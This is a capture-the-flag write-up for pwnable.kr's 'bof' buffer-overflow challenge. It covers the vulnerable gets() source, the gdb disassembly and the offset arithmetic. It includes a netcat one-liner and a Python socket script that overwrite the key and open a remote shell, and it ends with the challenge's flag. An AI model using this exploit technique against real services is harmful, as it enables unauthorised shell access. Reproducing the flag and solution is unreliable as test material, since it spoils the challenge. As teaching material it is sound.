# bof - 5 pt

{% hint style="info" %}
Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?

Download : <http://pwnable.kr/bin/bof>\
Download : <http://pwnable.kr/bin/bof.c>

Running at : nc pwnable.kr 9000
{% endhint %}

The contents of bof.c are as follows.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}
```

Disassembling `func()` in the bof binary with gdb gives the following.

```bash
(gdb) disas func
Dump of assembler code for function func:
   0x0000062c <+0>:     push   %ebp
   0x0000062d <+1>:     mov    %esp,%ebp
   0x0000062f <+3>:     sub    $0x48,%esp
   0x00000632 <+6>:     mov    %gs:0x14,%eax
   0x00000638 <+12>:    mov    %eax,-0xc(%ebp)
   0x0000063b <+15>:    xor    %eax,%eax
   0x0000063d <+17>:    movl   $0x78c,(%esp)
   0x00000644 <+24>:    call   0x645 <func+25>
   0x00000649 <+29>:    lea    -0x2c(%ebp),%eax
   0x0000064c <+32>:    mov    %eax,(%esp)
   0x0000064f <+35>:    call   0x650 <func+36>
   0x00000654 <+40>:    cmpl   $0xcafebabe,0x8(%ebp)
   0x0000065b <+47>:    jne    0x66b <func+63>
   0x0000065d <+49>:    movl   $0x79b,(%esp)
   0x00000664 <+56>:    call   0x665 <func+57>
   0x00000669 <+61>:    jmp    0x677 <func+75>
   0x0000066b <+63>:    movl   $0x7a3,(%esp)
   0x00000672 <+70>:    call   0x673 <func+71>
   0x00000677 <+75>:    mov    -0xc(%ebp),%eax
   0x0000067a <+78>:    xor    %gs:0x14,%eax
   0x00000681 <+85>:    je     0x688 <func+92>
   0x00000683 <+87>:    call   0x684 <func+88>
   0x00000688 <+92>:    leave
   0x00000689 <+93>:    ret
End of assembler dump.
```

There are five `call` instructions. Their targets show up as `func+N` because the binary is position-independent and was disassembled without being loaded, so each `call` appears to point at the instruction right after it; the callees therefore have to be inferred from the arguments set up before each call. The first four are inferred to be `printf()`, `gets()`, `system()` and `printf()`. The fifth, at `<+87>`, is reached only when the value saved at `-0xc(%ebp)` no longer matches `%gs:0x14`, i.e. it is the stack-protector failure path.

From the arguments to these calls we can read off where `overflowme` and `key` live in the frame.

The following shows that `overflowme` is at `ebp - 0x2c` (its address is loaded into `eax` and passed as the argument to `gets()`).

```bash
   0x00000649 <+29>:    lea    -0x2c(%ebp),%eax
   0x0000064c <+32>:    mov    %eax,(%esp)
   0x0000064f <+35>:    call   0x650 <func+36>
```

The following shows that `key` is at `ebp + 0x08`, which is where the first argument of a cdecl function sits on 32-bit x86.

```bash
   0x00000654 <+40>:    cmpl   $0xcafebabe,0x8(%ebp)
   0x0000065b <+47>:    jne    0x66b <func+63>
   0x0000065d <+49>:    movl   $0x79b,(%esp)
   0x00000664 <+56>:    call   0x665 <func+57>
```

0x08 is 8 in decimal and 0x2c is 44, so `overflowme` starts 44 bytes below `ebp` and `key` sits 8 bytes above it: 44 + 8 = 52 bytes of padding followed by the 4-byte key overwrite `key`. Because x86 is little-endian, `0xcafebabe` has to be sent as `\xbe\xba\xfe\xca`. The 52 bytes of padding also run over the stack canary at `ebp - 0xc`, the saved `ebp` and the return address, but that does not stop the exploit: `key` is compared and `system("/bin/sh")` is called at `<+40>` to `<+56>`, while the canary is only checked at `<+78>`, after `system()` returns. The shell is spawned first; the stack-protector abort only happens once the shell exits and `func()` tries to return. In the session below, the `cat` after the Python command keeps stdin open so that the commands typed afterwards reach the spawned shell.

```bash
~
❯ (python -c 'print("A" * 52 + "\xbe\xba\xfe\xca")';cat) | nc pwnable.kr 9000
ls
bof
bof.c
flag
log
log2
super.pl
cat flag
daddy, I just pwned a buFFer :)
```
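A scripted version of the exploit above, written as an added example for this page rather than the writeup's own command: it derives the 52-byte offset from the two `ebp`-relative offsets in the disassembly instead of hard-coding it, packs the key in little-endian order explicitly, and can either emit the raw payload for piping into `nc` or talk to the service itself over a socket. The host, port and the `cat flag; exit` command are assumptions taken from the session above.

```python
"""Scripted version of the pwnable.kr bof exploit (Python 3)."""
import socket
import struct
import sys

# Offsets relative to ebp, read off the disassembly of func().
OVERFLOWME_OFF = -0x2c   # lea -0x2c(%ebp),%eax        -> buffer passed to gets()
CANARY_OFF     = -0x0c   # mov %eax,-0xc(%ebp)         -> stack-protector slot
SAVED_EBP_OFF  = 0x00    # pushed by "push %ebp"
RET_OFF        = 0x04    # return address pushed by main's call
KEY_OFF        = 0x08    # cmpl $0xcafebabe,0x8(%ebp)  -> first argument (cdecl)
TARGET_KEY     = 0xCAFEBABE


def frame_layout():
    """Byte offset, measured from the start of overflowme, of every slot
    the overflow runs through on its way to key."""
    return {
        "canary":    CANARY_OFF    - OVERFLOWME_OFF,  # 32: gets() clobbers this first
        "saved_ebp": SAVED_EBP_OFF - OVERFLOWME_OFF,  # 44
        "ret":       RET_OFF       - OVERFLOWME_OFF,  # 48
        "key":       KEY_OFF       - OVERFLOWME_OFF,  # 52
    }


def build_payload(key=TARGET_KEY, filler=b"A"):
    """52 filler bytes, then key as a 32-bit little-endian value (x86)."""
    return filler * frame_layout()["key"] + struct.pack("<I", key)


def exploit(host="pwnable.kr", port=9000, cmd=b"cat flag; exit\n"):
    """Send the payload plus one shell command and return everything the
    service writes back.  'exit' makes /bin/sh quit, so func() returns,
    the clobbered canary check fires and the server closes the socket.
    host/port/cmd are assumptions taken from the writeup's session."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(build_payload() + b"\n" + cmd)
        out = b""
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break          # service kept the socket open; stop waiting
            if not chunk:
                break          # remote side closed the connection
            out += chunk
        return out


if __name__ == "__main__":
    if "--stdout" in sys.argv:
        # Raw bytes for piping into nc, e.g.
        #   (python3 bof.py --stdout; cat) | nc pwnable.kr 9000
        sys.stdout.buffer.write(build_payload() + b"\n")
        sys.stdout.buffer.flush()
    else:
        sys.stdout.write(exploit().decode(errors="replace"))
```

The payload is written through `sys.stdout.buffer` on purpose: the one-liner in the session above only works under Python 2, where `print` of a `str` emits raw bytes. Under Python 3 `print("\xbe\xba\xfe\xca")` would UTF-8-encode each of those characters into two bytes and `key` would end up with the wrong value.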

{% hint style="success" %}
Flag? : daddy, I just pwned a buFFer :)
{% endhint %}

